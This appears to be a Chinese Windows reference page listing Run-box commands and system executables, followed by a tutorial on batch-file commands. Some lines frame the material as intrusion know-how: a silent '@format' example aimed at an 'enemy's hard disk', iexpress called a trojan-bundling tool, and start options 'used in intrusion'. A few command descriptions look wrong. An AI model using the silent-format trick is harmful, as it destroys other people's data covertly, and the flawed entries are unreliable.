? Windows命令 ? ? ? ? ? ? 輸入方法：點擊 開始》運行 ? ? ? ? ? ? 1.常用Windows命令 ? ? ? ? ? ? winver---------檢查windows版本 ? ? ? ? ? ? wmimgmt.msc----打開windows管理體系結構(wmi) ? ? ? ? ? ? wupdmgr--------windows更新程序 ? ? ? ? ? ? wscript--------windows腳本宿主設置 ? ? ? ? ? ? write----------寫字板 ? ? ? ? ? ? winmsd---------系統信息 ? ? ? ? ? ? wiaacmgr-------掃描儀和照相機向導 ? ? ? ? ? ? winchat--------xp自帶局域網聊天 ? ? ? ? ? ? mem.exe--------顯示內存使用情況 ? ? ? ? ? ? msconfig.exe---系統配置實用程序 ? ? ? ? ? ? mplayer2-------簡易widnows media player ? ? ? ? ? ? mspaint--------畫圖板 ? ? ? ? ? ? mstsc----------遠程桌面連接 ? ? ? ? ? ? mplayer2-------媒體播放機 ? ? ? ? ? ? magnify--------放大鏡實用程序 ? ? ? ? ? ? mmc------------打開控制臺 ? ? ? ? ? ? mobsync--------同步命令 ? ? ? ? ? ? dxdiag---------檢查directx信息 ? ? ? ? ? ? drwtsn32------ 系統醫生 ? ? ? ? ? ? devmgmt.msc--- 設備管理器 ? ? ? ? ? ? dfrg.msc-------磁盤碎片整理程序 ? ? ? ? ? ? diskmgmt.msc---磁盤管理實用程序 ? ? ? ? ? ? dcomcnfg-------打開系統組件服務 ? ? ? ? ? ? ddeshare-------打開dde共享設置 ? ? ? ? ? ? dvdplay--------dvd播放器 ? ? ? ? ? ? net stop messenger-----停止信使服務 ? ? ? ? ? ? net start messenger----開始信使服務 ? ? ? ? ? ? notepad--------打開記事本 ? ? ? ? ? ? nslookup-------網絡管理的工具向導 ? ? ? ? ? ? ntbackup-------系統備份和還原 ? ? ? ? ? ? narrator-------屏幕“講述人” ? ? ? ? ? ? ntmsmgr.msc----移動存儲管理器 ? ? ? ? ? ? ntmsoprq.msc---移動存儲管理員操作請求 ? ? ? ? ? ? netstat -an----(tc)命令檢查接口 ? ? ? ? ? ? syncapp--------創建一個公文包 ? ? ? ? ? ? sysedit--------系統配置編輯器 ? ? ? ? ? ? sigverif-------文件簽名驗證程序 ? ? ? ? ? ? sndrec32-------錄音機 ? ? ? ? ? ? shrpubw--------創建共享文件夾 ? ? ? ? ? ? secpol.msc-----本地安全策略 ? ? ? ? ? ? syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼 ? ? ? ? ? ? services.msc---本地服務設置 ? ? ? ? ? ? sndvol32-------音量控制程序 ? ? ? ? ? ? sfc.exe--------系統文件檢查器 ? ? ? ? ? ? sfc /scannow---windows文件保護 ? ? ? ? ? ? tsshutdn-------60秒倒計時關機命令 ? ? ? ? ? ? tourstart------xp簡介（安裝完成后出現的漫游xp程序） ? ? ? ? ? ? taskmgr--------任務管理器 ? ? ? ? ? ? eventvwr-------事件查看器 ? ? ? ? ? ? eudcedit-------造字程序 ? ? ? ? ? ? explorer-------打開資源管理器 ? ? ? ? ? ? packager-------對象包裝程序 ? ? ? ? ? ? perfmon.msc----計算機性能監測程序 ? ? ? ? ? ? progman--------程序管理器 ? ? ? ? ? ? regedit.exe----注冊表 ? ? ? ? ? ? rsop.msc-------組策略結果集 ? ? ? ? ? ? regedt32-------注冊表編輯器 ? ? ? ? ? ? rononce -p ----15秒關機 ? ? ? ? ? ? regsvr32 /u *.dll----停止dll文件運行 ? ? ? ? ? ? regsvr32 /u zipfldr.dll------取消zip支持 ? ? ? ? ? ? cmd.exe--------cmd命令提示符 ? ? ? ? ? ? chkdsk.exe-----chkdsk磁盤檢查 ? ? ? ? ? ? certmgr.msc----證書管理實用程序 ? ? ? ? ? ? calc-----------啟動計算器 ? ? ? ? ? ? charmap--------啟動字符映射表 ? ? ? ? ? ? cliconfg-------sql server 客戶端網絡實用程序 ? ? ? ? ? ? clipbrd--------剪貼板查看器 ? ? ? ? ? ? conf-----------啟動netmeeting ? ? ? ? ? ? compmgmt.msc---計算機管理 ? ? ? ? ? ? cleanmgr-------垃圾整理 ? ? ? ? ? ? ciadv.msc------索引服務程序 ? ? ? ? ? ? osk------------打開屏幕鍵盤 ? ? ? ? ? ? odbcad32-------odbc數據源管理器 ? ? ? ? ? ? oobe/msoobe /a----檢查xp是否激活 ? ? ? ? ? ? lusrmgr.msc----本機用戶和組 ? ? ? ? ? ? logoff---------注銷命令 ? ? ? ? ? ? iexpress-------木馬捆綁工具，系統自帶 ? ? ? ? ? ? nslookup-------ip地址偵測器 ? ? ? ? ? ? fsmgmt.msc-----共享文件夾管理器 ? ? ? ? ? ? utilman--------輔助工具管理器 ? ? ? ? ? ? gpedit.msc-----組策略 ? ? ? ? ? ? 2.其他更多Windows命令 ? ? ? ? ? ? accwiz.exe > Accessibility Wizard for walking you through ? ? ? ? ? ? setting up your machine for your mobility needs. 輔助工具向導 ? ? ? ? ? ? acsetups.exe > ACS setup DCOM server executable ? ? ? ? ? ? actmovie.exe > Direct Show setup tool 直接顯示安裝工具 ? ? ? ? ? ? append.exe > Allows programs to open data in specified ? ? ? ? ? ? directories as if they were in the current directory. ? ? ? ? ? ? 允許程序打開制定目錄中的數據 ? ? ? ? ? ? arp.exe > NETWORK Display and modify IP - Hardware addresses ? ? ? ? ? ? 顯示和更改計算機的IP與硬件物理地址的對應列表 ? ? ? ? ? ? at.exe > AT is a scheduling utility also included with UNIX ? ? ? ? ? ? 計劃運行任務 ? ? ? ? ? ? atmadm.exe > Displays statistics for ATM call manager. ? ? ? ? ? ? ATM調用管理器統計 ? ? ? ? ? ? attrib.exe > Display and modify attributes for files and ? ? ? ? ? ? folders 顯示和更改文件和文件夾屬性 ? ? ? ? ? ? autochk.exe > Used to check and repair Windows File Systems ? ? ? ? ? ? 檢測修復文件系統 ? ? ? ? ? ? autoconv.exe > Automates the file system conversion during ? ? ? ? ? ? reboots 在啟動過程中自動轉化系統 ? ? ? ? ? ? autofmt.exe > Automates the file format process during reboots ? ? ? ? ? ? 在啟動過程中格式化進程 ? ? ? ? ? ? autolfn.exe > Used for formatting long file names 使用長文件名格式 ? ? ? ? ? ? bootok.exe > Boot acceptance application for registry ? ? ? ? ? ? bootvrfy.exe > Bootvrfy.exe, a program included in Windows ? ? ? ? ? ? 2000 that notifies the system that startup was successful. ? ? ? ? ? ? Bootvrfy.exe can be run on a local or remote computer. 通報啟動成功 ? ? ? ? ? ? cacls.exe > Displays or modifies access control lists (ACLs) ? ? ? ? ? ? of files. 顯示和編輯ACL ? ? ? ? ? ? calc.exe > Windows Calculators 計算器 ? ? ? ? ? ? cdplayer.exe > Windows CD Player CD播放器 ? ? ? ? ? ? change.exe > Change { User │ Port │ Logon } 與終端服務器相關的查詢 ? ? ? ? ? ? charmap.exe > Character Map 字符映射表 ? ? ? ? ? ? chglogon.exe > Same as using "Change Logon" 啟動或停用會話記錄 ? ? ? ? ? ? chgport.exe > Same as using "Change Port" 改變端口（終端服務） ? ? ? ? ? ? chgusr.exe > Same as using "Change User" 改變用戶（終端服務） ? ? ? ? ? ? chkdsk.exe > Check the hard disk for errors similar to ? ? ? ? ? ? Scandisk 3 Stages must specify a Drive Letter 磁盤檢測程序 ? ? ? ? ? ? chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盤檢測程序 ? ? ? ? ? ? cidaemon.exe > Component of Ci Filer Service 組成Ci文檔服務 ? ? ? ? ? ? cipher.exe > Displays or alters the encryption of directories ? ? ? ? ? ? [files] on NTFS partitions. 在NTFS上顯示或改變加密的文件或目錄 ? ? ? ? ? ? cisvc.exe > Content Index -- It＇s the content indexing service ? ? ? ? ? ? for I 索引內容 ? ? ? ? ? ? ckcnv.exe > Cookie Convertor 變換Cookie ? ? ? ? ? ? cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盤清理 ? ? ? ? ? ? cliconfg.exe > SQL Server Client Network Utility SQL客戶網絡工具 ? ? ? ? ? ? clipbrd.exe > Clipboard viewer for Local will allow you to ? ? ? ? ? ? connect to other clipboards 剪貼簿查看器 ? ? ? ? ? ? clipsrv.exe > Start the clipboard Server 運行Clipboard服務 ? ? ? ? ? ? clspack.exe > CLSPACK used to create a file listing of system ? ? ? ? ? ? packages 建立系統文件列表清單 ? ? ? ? ? ? cluster.exe > Display a cluster in a domain 顯示域的集群 ? ? ? ? ? ? _cmd_.exe > Famous command prompt 沒什么好說的！ ? ? ? ? ? ? cmdl32.exe > Connection Manager Auto-Download 自動下載連接管理 ? ? ? ? ? ? cmmgr32.exe > Connection Manager 連接管理器 ? ? ? ? ? ? cmmon32.exe > Connection Manager Monitor 連接管理器監視 ? ? ? ? ? ? cmstp.exe > Connection Manager Profile Manager 連接管理器配置文件安裝程序 ? ? ? ? ? ? comclust.exe > about cluster server 集群 ? ? ? ? ? ? comp.exe > ComClust Add, Remove, or Join a cluster. ? ? ? ? ? ? 比較兩個文件和文件集的內容＊ ? ? ? ? ? ? compact.exe > Displays or alters the compression of files on ? ? ? ? ? ? NTFS partitions. 顯示或改變NTFS分區上文件的壓縮狀態 ? ? ? ? ? ? conime.exe > Console IME IME控制臺 ? ? ? ? ? ? control.exe > Starts the control panel 控制面板 ? ? ? ? ? ? convert.exe > Convert File System to NTFS 轉換文件系統到NTFS ? ? ? ? ? ? convlog.exe > Converts MS IIS log files 轉換IIS日志文件格式到NCSA格式 ? ? ? ? ? ? cprofile.exe > Copy profiles 轉換顯示模式 ? ? ? ? ? ? cscript.exe > MS Windows Scripts Host Version 5.1 較本宿主版本 ? ? ? ? ? ? csrss.exe > Client Server Runtime Process 客戶服務器Runtime進程 ? ? ? ? ? ? csvde.exe > Comma Separated Variable Import/Export Utility ? ? ? ? ? ? 日至格式轉換程序 ? ? ? ? ? ? dbgtrace.exe > 和Terminal Server相關 ? ? ? ? ? ? dcomcnfg.exe > Display the current DCOM configuration. ? ? ? ? ? ? DCOM配置屬性 ? ? ? ? ? ? dcphelp.exe > ? ? ? ? ? ? ? dcpromo.exe > Promote a domain controller to ADSI AD安裝向導 ? ? ? ? ? ? ddeshare.exe > Display DDE shares on local or remote computer ? ? ? ? ? ? DDE共享 ? ? ? ? ? ? ddmprxy.exe > ? ? ? ? ? ? debug.exe > Runs Debug, a program testing and editing tool. ? ? ? ? ? ? 就是DEBUG啦！ ? ? ? ? ? ? dfrgfat.exe > Defrag FAT file system FAT分區磁盤碎片整理程序 ? ? ? ? ? ? dfrgntfs.exe > Defrag NTFS file system NTFS分區磁盤碎片整理程序 ? ? ? ? ? ? dfs_cmd_.exe > configures a Dfs tree 配置一個DFS樹 ? ? ? ? ? ? dfsinit.exe > Distributed File System Initialization ? ? ? ? ? ? 分布式文件系統初始化 ? ? ? ? ? ? dfssvc.exe > Distributed File System Server 分布式文件系統服務器 ? ? ? ? ? ? diantz.exe > MS Cabinet Maker 制作CAB文件 ? ? ? ? ? ? diskperf.exe > Starts physical Disk Performance counters ? ? ? ? ? ? 磁盤性能計數器 ? ? ? ? ? ? dllhost.exe > dllhost is used on all versions of Windows 2000. ? ? ? ? ? ? dllhost is the hedost process for all COM+ applications. ? ? ? ? ? ? 所有COM+應用軟件的主進程 ? ? ? ? ? ? dllhst3g.exe > ? ? ? ? ? ? dmadmin.exe > Disk Manager Service 磁盤管理服務 ? ? ? ? ? ? dmremote.exe > Part of disk management 磁盤管理服務的一部分 ? ? ? ? ? ? dns.exe > DNS Applications DNS ? ? ? ? ? ? doskey.exe > recalls Windows command lines and creates macros ? ? ? ? ? ? 命令行創建宏 ? ? ? ? ? ? dosx.exe > DOS Extender DOS擴展 ? ? ? ? ? ? dplaysvr.exe > Direct Play Helper 直接運行幫助 ? ? ? ? ? ? drwatson.exe > Dr Watson for 2000 Fault Detector 華生醫生錯誤檢測 ? ? ? ? ? ? drwtsn32.exe > Dr Watson for 2000 viewer and configuration ? ? ? ? ? ? manager 華生醫生顯示和配置管理 ? ? ? ? ? ? dtcsetup.exe > Installs MDTC ? ? ? ? ? ? dvdplay.exe > Windows 2000 DVD player DVD播放 ? ? ? ? ? ? dxdiag.exe > Direct-X Diagnostics Direct-X診斷工具 ? ? ? ? ? ? edlin.exe > line-oriented text editor. 命令行的文本編輯器（歷史悠久啊！） ? ? ? ? ? ? esentutl.exe > MS Database Utility MS數據庫工具 ? ? ? ? ? ? eudcedit.exe > Private character editor Ture Type造字程序 ? ? ? ? ? ? eventvwr.exe > Windows 2000 Event Viewer 事件查看器 ? ? ? ? ? ? evnt_cmd_.exe > Event to trap translator; Configuration tool ? ? ? ? ? ? evntwin.exe > Event to trap translator setup ? ? ? ? ? ? exe2bin.exe > Converts EXE to binary format 轉換EXE文件到二進制 ? ? ? ? ? ? expand.exe > Expand Files that have been compressed 解壓縮 ? ? ? ? ? ? extrac32.exe > CAB File extraction utility 解CAB工具 ? ? ? ? ? ? fastopen.exe > Fastopen tracks the location of files on a hard ? ? ? ? ? ? disk and stores the information in memory for fast access. ? ? ? ? ? ? 快速訪問在內存中的硬盤文件 ? ? ? ? ? ? faxcover.exe > Fax Cover page editor 傳真封面編輯 ? ? ? ? ? ? faxqueue.exe > Display Fax Queue 顯示傳真隊列 ? ? ? ? ? ? faxsend.exe > Fax Wizard for sending faxes 發送傳真向導 ? ? ? ? ? ? faxsvc.exe > Starts fax server 啟動傳真服務 ? ? ? ? ? ? fc.exe > Compares two files or sets of files and their ? ? ? ? ? ? differences 比較兩個文件的不同 ? ? ? ? ? ? find.exe > Searches for a text string in file or files ? ? ? ? ? ? 查找文件中的文本行 ? ? ? ? ? ? findstr.exe > Searches for strings in files 查找文件中的行 ? ? ? ? ? ? finger.exe > Fingers a user and displays statistics on that ? ? ? ? ? ? user Finger一個用戶并顯示出統計結果 ? ? ? ? ? ? fixmapi.exe > Fix mapi files 修復MAPI文件 ? ? ? ? ? ? flattemp.exe > Enable or disable temporally directories ? ? ? ? ? ? 允許或者禁用臨時文件目錄 ? ? ? ? ? ? fontview.exe > Display fonts in a font file 顯示字體文件中的字體 ? ? ? ? ? ? forcedos.exe > Forces a file to start in dos mode. ? ? ? ? ? ? 強制文件在DOS模式下運行 ? ? ? ? ? ? freecell.exe > Popular Windows Game 空當接龍 ? ? ? ? ? ? ftp.exe > File Transfer Protocol used to transfer files over a ? ? ? ? ? ? network connection 就是FTP了 ? ? ? ? ? ? gdi.exe > Graphic Device Interface 圖形界面驅動 ? ? ? ? ? ? grovel.exe > ? ? ? ? ? ? grpconv.exe > Program Manager Group Convertor 轉換程序管理員組 ? ? ? ? ? ? help.exe > displays help for Windows 2000 commands 顯示幫助 ? ? ? ? ? ? hostname.exe > Display hostname for machine. 顯示機器的Hostname ? ? ? ? ? ? ie4uinit.exe > IE5 User Install tool IE5用戶安裝工具 ? ? ? ? ? ? ieshwiz.exe > Customize folder wizard 自定義文件夾向導 ? ? ? ? ? ? iexpress.exe > Create and setup packages for install 穿件安裝包 ? ? ? ? ? ? iisreset.exe > Restart IIS Admin Service 重啟IIS服務 ? ? ? ? ? ? internat.exe > Keyboard Language Indicator Applet 鍵盤語言指示器 ? ? ? ? ? ? ipconfig.exe > Windows 2000 IP configuration. 察看IP配置 ? ? ? ? ? ? ipsecmon.exe > IP Security Monitor IP安全監視器 ? ? ? ? ? ? ipxroute.exe > IPX Routing and Source Routing Control Program ? ? ? ? ? ? IPX路由和源路由控制程序 ? ? ? ? ? ? irftp.exe > Setup FTP for wireless communication 無線連接 ? ? ? ? ? ? ismserv.exe > Intersite messaging Service 安裝或者刪除Service ? ? ? ? ? ? Control Manager中的服務 ? ? ? ? ? ? jdbgmgr.exe > Microsoft debugger for java 4 Java4的調試器 ? ? ? ? ? ? jetconv.exe > Convert a Jet Engine Database 轉換Jet Engine數據庫 ? ? ? ? ? ? jetpack.exe > Compact Jet Database. 壓縮Jet數據庫 ? ? ? ? ? ? jview.exe > Command-line loader for Java Java的命令行裝載者 ? ? ? ? ? ? krnl386.exe > Core Component for Windows 2000 2000的核心組件 ? ? ? ? ? ? label.exe > Change label for drives 改變驅動器的卷標 ? ? ? ? ? ? lcwiz.exe > License Compliance Wizard for local or remote ? ? ? ? ? ? systems. 許可證符合向導 ? ? ? ? ? ? ldifde.exe > LDIF cmd line manager LDIF目錄交換命令行管理 ? ? ? ? ? ? licmgr.exe > Terminal Server License Manager 終端服務許可協議管理 ? ? ? ? ? ? lights.exe > display connection status lights 顯示連接狀況 ? ? ? ? ? ? llsmgr.exe > Windows 2000 License Manager 2000許可協議管理 ? ? ? ? ? ? llssrv.exe > Start the license Server 啟動許可協議服務器 ? ? ? ? ? ? lnkstub.exe > ? ? ? ? ? ? locator.exe > RPC Locator 遠程定位 ? ? ? ? ? ? lodctr.exe > Load perfmon counters 調用性能計數 ? ? ? ? ? ? logoff.exe > Log current user off. 注銷用戶 ? ? ? ? ? ? lpq.exe > Displays status of a remote LPD queue ? ? ? ? ? ? 顯示遠端的LPD打印隊列的狀態，顯示被送到基于Unix的服務器的打印任務 ? ? ? ? ? ? lpr.exe > Send a print job to a network printer. ? ? ? ? ? ? 重定向打印任務到網絡中的打印機。通常用于Unix客戶打印機將打印任務發送給連接了打印設備的NT的打印機服務器。 ? ? ? ? ? ? lsass.exe > LSA Executable and Server DLL 運行LSA和Server的DLL ? ? ? ? ? ? lserver.exe > Specifies the new DNS domain for the default ? ? ? ? ? ? server 指定默認Server新的DNS域 ? ? ? ? ? ? macfile.exe > Used for managing MACFILES 管理MACFILES ? ? ? ? ? ? magnify.exe > Used to magnify the current screen 放大鏡 ? ? ? ? ? ? makecab.exe > MS Cabinet Maker 制作CAB文件 ? ? ? ? ? ? mdm.exe > Machine Debug Manager 機器調試管理 ? ? ? ? ? ? mem.exe > Display current Memory stats 顯示內存狀態 ? ? ? ? ? ? migpwd.exe > Migrate passwords. 遷移密碼 ? ? ? ? ? ? mmc.exe > Microsoft Management Console 控制臺 ? ? ? ? ? ? mnmsrvc.exe > Netmeeting Remote Desktop Sharing ? ? ? ? ? ? NetMeeting遠程桌面共享 ? ? ? ? ? ? mobsync.exe > Manage Synchronization. 同步目錄管理器 ? ? ? ? ? ? 批處理命令 ? ? ? ? ? ? 1、Echo 命令 ? ? ? ? ? ? 打開回顯或關閉請求回顯功能，或顯示消息。如果沒有任何參數，echo 命令將顯示當前回顯設置。 ? ? ? ? ? ? 語法 ? ? ? ? ? ? echo [{on│off}] [message] ? ? ? ? ? ? Sample：@echo off / echo hello world ? ? ? ? ? ? 在實際應用中我們會把這條命令和重定向符號（也稱為管道符號，一般用> >> ? ? ? ? ? ? ^）結合來實現輸入一些命令到特定格式的文件中.這將在以后的例子中體現出來。 ? ? ? ? ? ? 2.@ 命令 ? ? ? ? ? ? 表示不顯示@后面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬盤）自然不能讓對方看到你使用的命令啦。 ? ? ? ? ? ? Sample：@echo off ? ? ? ? ? ? @echo Now initializing the program,please wait a minite... ? ? ? ? ? ? @format X: /q/u/autoset (format ? ? ? ? ? ? 這個命令是不可以使用/y這個參數的，可喜的是微軟留了個autoset這個參數給我們，效果和/y是一樣的。) ? ? ? ? ? ? 3.Goto 命令 ? ? ? ? ? ? 指定跳轉到標簽，找到標簽后，程序將處理從下一行開始的命令。 ? ? ? ? ? ? 語法：goto label （label是參數，指定所要轉向的批處理程序中的行。） ? ? ? ? ? ? Sample： ? ? ? ? ? ? if {%1}=={} goto noparms ? ? ? ? ? ? if {%2}=={} goto noparms（如果這里的if、%1、%2你不明白的話，先跳過去，后面會有詳細的解釋。） ? ? ? ? ? ? @Rem check parameters if null show usage ? ? ? ? ? ? :noparms ? ? ? ? ? ? echo Usage: monitor.bat ServerIP PortNumber ? ? ? ? ? ? goto end ? ? ? ? ? ? 標簽的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標簽，goto命令就是根據這個：來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會理解你的意圖啊。 ? ? ? ? ? ? 4.Rem 命令 ? ? ? ? ? ? 注釋命令，在C語言中相當與/*--------*/,它并不會被執行，只是起一個注釋的作用，便于別人閱讀和你自己日后修改。 ? ? ? ? ? ? Rem Message ? ? ? ? ? ? Sample：@Rem Here is the description. ? ? ? ? ? ? 5.Pause 命令 ? ? ? ? ? ? 運行 Pause 命令時，將顯示下面的消息： ? ? ? ? ? ? Press any key to continue . . . ? ? ? ? ? ? Sample： ? ? ? ? ? ? @echo off ? ? ? ? ? ? :begin ? ? ? ? ? ? copy a:*.* d：\back ? ? ? ? ? ? echo Please put a new disk into driver A ? ? ? ? ? ? pause ? ? ? ? ? ? goto begin ? ? ? ? ? ? 在這個例子中，驅動器 A 中磁盤上的所有文件均復制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅動器 A ? ? ? ? ? ? 時，pause 命令會使程序掛起，以便您更換磁盤，然后按任意鍵繼續處理。 ? ? ? ? ? ? 6.Call 命令 ? ? ? ? ? ? 從一個批處理程序調用另一個批處理程序，并且不終止父批處理程序。call ? ? ? ? ? ? 命令接受用作調用目標的標簽。如果在腳本或批處理文件外使用 Call，它將不會在命令行起作用。 ? ? ? ? ? ? 語法 ? ? ? ? ? ? call [[Drive:][Path] FileName [BatchParameters]] [:label ? ? ? ? ? ? [arguments]] ? ? ? ? ? ? 參數 ? ? ? ? ? ? [Drive:}[Path] FileName ? ? ? ? ? ? 指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。 ? ? ? ? ? ? 7.start 命令 ? ? ? ? ? ? 調用外部程序，所有的DOS命令和命令行程序都可以由start命令來調用。 ? ? ? ? ? ? 入侵常用參數： ? ? ? ? ? ? MIN 開始時窗口最小化 ? ? ? ? ? ? SEPARATE 在分開的空間內開始 16 位 Windows 程序 ? ? ? ? ? ? HIGH 在 HIGH 優先級類別開始應用程序 ? ? ? ? ? ? REALTIME 在 REALTIME 優先級類別開始應用程序 ? ? ? ? ? ? WAIT 啟動應用程序并等候它結束 ? ? ? ? ? ? parameters 這些為傳送到命令/程序的參數 ? ? ? ? ? ? 執行的應用程序是 32-位 GUI 應用程序時，CMD.EXE ? ? ? ? ? ? 不等應用程序終止就返回命令提示。如果在命令腳本內執行，該新行為則不會發生。 ? ? ? ? ? ? 8.choice 命令 ? ? ? ? ? ? choice ? ? ? ? ? ? 使用此命令可以讓用戶輸入一個字符，從而運行不同的命令。使用時應該加/c:參數，c:后應寫提示可輸入的字符，之間無空格。它的返回碼為1234…… ? ? ? ? ? ? 如: choice /c:dme defrag,mem,end ? ? ? ? ? ? 將顯示 ? ? ? ? ? ? defrag,mem,end[D,M,E]? ? ? ? ? ? ? Sample： ? ? ? ? ? ? test.bat的內容如下: ? ? ? ? ? ? @echo off ? ? ? ? ? ? choice /c:dme defrag,mem,end ? ? ? ? ? ? if errorlevel 3 goto defrag （應先判斷數值最高的錯誤碼） ? ? ? ? ? ? if errorlevel 2 goto mem ? ? ? ? ? ? if errotlevel 1 goto end ? ? ? ? ? ? :defrag ? ? ? ? ? ? c:\dos\defrag ? ? ? ? ? ? goto end ? ? ? ? ? ? :mem ? ? ? ? ? ? mem ? ? ? ? ? ? goto end ? ? ? ? ? ? :end ? ? ? ? ? ? echo good bye ? ? ? ? ? ? 此文件運行后，將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ? ? ? ? ? ? ，然后if語句將作出判斷，d表示執行標號為defrag的程序段，m表示執行標號為mem的程序段，e表示執行標號為end的程序段，每個程序段最后都以goto ? ? ? ? ? ? end將程序跳到end標號處，然后程序將顯示good bye，文件結束。 ? ? ? ? ? ? 9.If 命令 ? ? ? ? ? ? if 表示將判斷是否符合規定的條件，從而決定執行不同的命令。 有三種格式: ? ? ? ? ? ? 1、if "參數" == "字符串" 　待執行的命令 ? ? ? ? ? ? 參數如果等于指定的字符串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號） ? ? ? ? ? ? 如if "%1"=="a" format a: ? ? ? ? ? ? if {%1}=={} goto noparms ? ? ? ? ? ? if {%2}=={} goto noparms ? ? ? ? ? ? 2、if exist 文件名　 待執行的命令 ? ? ? ? ? ? 如果有指定的文件，則條件成立，運行命令，否則運行下一句。 ? ? ? ? ? ? 如if exist config.sys edit config.sys ? ? ? ? ? ? 3、if errorlevel / if not errorlevel 數字　 待執行的命令 ? ? ? ? ? ? 如果返回碼等于指定的數字，則條件成立，運行命令，否則運行下一句。 ? ? ? ? ? ? 如if errorlevel 2 goto x2 　 ? ? ? ? ? ? DOS程序運行時都會返回一個數字給DOS，稱為錯誤碼errorlevel或稱返回碼，常見的返回碼為0、1。 ? ? ? ? ? ? 10.for 命令 ? ? ? ? ? ? for 命令是一個比較復雜的命令，主要用于參數在指定的范圍內循環執行命令。 ? ? ? ? ? ? 在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable ? ? ? ? ? ? for {%variable│%%variable} in (set) do command [ ? ? ? ? ? ? CommandLineOptions] ? ? ? ? ? ? %variable 指定一個單一字母可替換的參數。 ? ? ? ? ? ? (set) 指定一個或一組文件。可以使用通配符。 ? ? ? ? ? ? command 指定對每個文件執行的命令。 ? ? ? ? ? ? command-parameters 為特定命令指定參數或命令行開關。 ? ? ? ? ? ? 在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable ? ? ? ? ? ? 而不要用 %variable。變量名稱是區分大小寫的，所以 %i 不同于 %I ? ? ? ? ? ? 如果命令擴展名被啟用，下列額外的 FOR 命令格式會受到 ? ? ? ? ? ? 支持: ? ? ? ? ? ? FOR /D %variable IN (set) DO command [command-parameters] ? ? ? ? ? ? 如果集中包含通配符，則指定與目錄名匹配，而不與文件 ? ? ? ? ? ? 名匹配。 ? ? ? ? ? ? FOR /R [[drive:]path] %variable IN (set) DO command [command- ? ? ? ? ? ? 檢查以 [drive:]path 為根的目錄樹，指向每個目錄中的 ? ? ? ? ? ? FOR 語句。如果在 /R 后沒有指定目錄，則使用當前 ? ? ? ? ? ? 目錄。如果集僅為一個單點(.)字符，則枚舉該目錄樹。 ? ? ? ? ? ? FOR /L %variable IN (start,step,end) DO command [command-para ? ? ? ? ? ? 該集表示以增量形式從開始到結束的一個數字序列。 ? ? ? ? ? ? 因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生 ? ? ? ? ? ? 序列 (5 4 3 2 1)。 ? ? ? ? ? ? FOR /F ["options"] %variable IN (file-set) DO command ? ? ? ? ? ? FOR /F ["options"] %variable IN ("string") DO command ? ? ? ? ? ? FOR /F ["options"] %variable IN (＇command＇) DO command ? ? ? ? ? ? 或者，如果有 usebackq 選項: ? ? ? ? ? ? FOR /F ["options"] %variable IN (file-set) DO command ? ? ? ? ? ? FOR /F ["options"] %variable IN ("string") DO command ? ? ? ? ? ? FOR /F ["options"] %variable IN (＇command＇) DO command ? ? ? ? ? ? filenameset 為一個或多個文件名。繼續到 filenameset 中的 ? ? ? ? ? ? 下一個文件之前，每份文件都已被打開、讀取并經過處理。 ? ? ? ? ? ? 處理包括讀取文件，將其分成一行行的文字，然后將每行 ? ? ? ? ? ? 解析成零或更多的符號。然后用已找到的符號字符串變量值 ? ? ? ? ? ? 調用 For 循環。以默認方式，/F 通過每個文件的每一行中分開 ? ? ? ? ? ? 的第一個空白符號。跳過空白行。您可通過指定可選 "options" ? ? ? ? ? ? 參數替代默認解析操作。這個帶引號的字符串包括一個或多個 ? ? ? ? ? ? 指定不同解析選項的關鍵字。這些關鍵字為: ? ? ? ? ? ? eol=c - 指一個行注釋字符的結尾(就一個) ? ? ? ? ? ? skip=n - 指在文件開始時忽略的行數。 ? ? ? ? ? ? delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的 ? ? ? ? ? ? 默認分隔符集。 ? ? ? ? ? ? tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代 ? ? ? ? ? ? 的 for 本身。這會導致額外變量名稱的 ? ? ? ? ? ? 格式為一個范圍。通過 nth 符號指定 m ? ? ? ? ? ? 符號字符串中的最后一個字符星號， ? ? ? ? ? ? 那么額外的變量將在最后一個符號解析之 ? ? ? ? ? ? 分配并接受行的保留文本。 ? ? ? ? ? ? usebackq - 指定新語法已在下類情況中使用: ? ? ? ? ? ? 在作為命令執行一個后引號的字符串并且 ? ? ? ? ? ? 引號字符為文字字符串命令并允許在 fi ? ? ? ? ? ? 中使用雙引號擴起文件名稱。 ? ? ? ? ? ? sample1: ? ? ? ? ? ? FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do ? ? ? ? ? ? command ? ? ? ? ? ? 會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將 ? ? ? ? ? ? 每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和/或 ? ? ? ? ? ? 空格定界符號。請注意，這個 for 程序體的語句引用 %i 來 ? ? ? ? ? ? 取得第二個符號，引用 %j 來取得第三個符號，引用 %k ? ? ? ? ? ? 來取得第三個符號后的所有剩余符號。對于帶有空格的文件 ? ? ? ? ? ? 名，您需要用雙引號將文件名括起來。為了用這種方式來使 ? ? ? ? ? ? 用雙引號，您還需要使用 usebackq 選項，否則，雙引號會 ? ? ? ? ? ? 被理解成是用作定義某個要分析的字符串的。 ? ? ? ? ? ? %i 專門在 for 語句中得到說明，%j 和 %k 是通過 ? ? ? ? ? ? tokens= 選項專門得到說明的。您可以通過 tokens= 一行 ? ? ? ? ? ? 指定最多 26 個符號，只要不試圖說明一個高于字母 ＇z＇ 或 ? ? ? ? ? ? ＇Z＇ 的變量。請記住，FOR 變量是單一字母、分大小寫和全局的； ? ? ? ? ? ? 同時不能有 52 個以上都在使用中。 ? ? ? ? ? ? 您還可以在相鄰字符串上使用 FOR /F 分析邏輯；方法是， ? ? ? ? ? ? 用單引號將括號之間的 filenameset 括起來。這樣，該字符 ? ? ? ? ? ? 串會被當作一個文件中的一個單一輸入行。 ? ? ? ? ? ? 